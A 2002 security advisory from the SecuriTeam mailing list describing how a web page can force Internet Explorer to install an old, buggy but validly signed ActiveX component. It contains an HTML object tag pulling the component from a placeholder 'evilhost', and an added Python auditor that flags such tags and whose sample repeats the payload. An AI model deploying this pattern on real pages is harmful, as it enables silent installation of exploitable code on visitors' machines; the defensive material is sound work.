[NT] Digitally Signing Buggy ActiveX Components
From: support@securiteam.com
Date: 02/15/02
From: support@securiteam.com
To: list@securiteam.com
Date: Fri, 15 Feb 2002 19:37:42 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Digitally Signing Buggy ActiveX Components
------------------------------------------------------------------------
SUMMARY
Back in 1999 Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES>
made an excellent point at:
"Even if Microsoft fixes the hole, the hole will still exist forever. Why?
As far as we know this is the first time a hole has been "SIGNED" (made
to be trusted by Microsoft). MS has released a "dhtmed.cab" file as an
ActiveX component signed by Microsoft." This means that any client that
can be made to automatically install the package containing a known hole
immediately becomes vulnerable.
DETAILS
ActiveX in Internet Explorer allows signed components (native code) to be
downloaded from the web and installed on the user's computer.
As history shows, many ActiveX components are buggy, and new versions are
released to fix them. The interesting part is that the buggy version is
still genuinely signed and remains available in one form or another.
A purely hypothetical scenario is to try to install the old, buggy, signed
version, either when the user does not have the component at all or on top
of the patched one. This is done as follows:
<object codebase="http://evilhost/buggyreallysigned.file"
classid="clsid:speciallycrafted">
</object>
This enables the attacker to use the buggy ActiveX component and exploit
the vulnerability.
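An added defensive example, not part of the original advisory: a content-filter style check that flags `<object>` tags whose `codebase` asks the browser to fetch a component from a host outside an allowlist, without treating a valid signature as grounds for trust. The allowlist host, the CLSIDs, the page host and the function names are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed policy values for this example; not taken from the advisory.
ALLOWED_CODEBASE_HOSTS = {"controls.intranet.example"}
SUPERSEDED_CLSIDS = {"00000000-0000-0000-0000-00000000babe"}  # placeholder

class ObjectAuditor(HTMLParser):
    """Flag <object> tags that ask the browser to fetch native code."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []  # (classid, codebase_host, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag != "object":
            return
        attr = {k: (v or "").strip() for k, v in attrs}  # names arrive lowercased
        codebase = attr.get("codebase", "")
        if not codebase:
            return  # no component download requested
        # Normalise "clsid:{...}" to the bare lowercase identifier.
        clsid = attr.get("classid", "").lower().split("clsid:", 1)[-1].strip("{}")
        try:
            # A relative codebase resolves against the page's own host.
            host = (urlsplit(codebase).hostname or self.page_host).lower()
        except ValueError:
            host = "<unparseable>"
        reasons = []
        if host not in ALLOWED_CODEBASE_HOSTS:
            reasons.append("codebase host not on allowlist")
        if clsid in SUPERSEDED_CLSIDS:
            reasons.append("classid has a known-buggy signed release")
        # A valid signature is deliberately not treated as a reason to trust
        # the download: the old buggy build is genuinely signed too.
        if reasons:
            self.findings.append((clsid, host, reasons))

def audit(html, page_host):
    """Return findings for every <object codebase=...> in the HTML text."""
    auditor = ObjectAuditor(page_host)
    auditor.feed(html)
    auditor.close()
    return auditor.findings

# Constructed sample page: the advisory's pattern plus an allowlisted control.
SAMPLE = """
<object codebase="http://evilhost/buggyreallysigned.file" classid="clsid:00000000-0000-0000-0000-00000000BABE"></object>
<object codebase="https://controls.intranet.example/viewer.cab" classid="clsid:11111111-1111-1111-1111-111111111111"></object>
"""
```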
ADDITIONAL INFORMATION
The information has been provided by Georgi Guninski
<guninski@guninski.com>.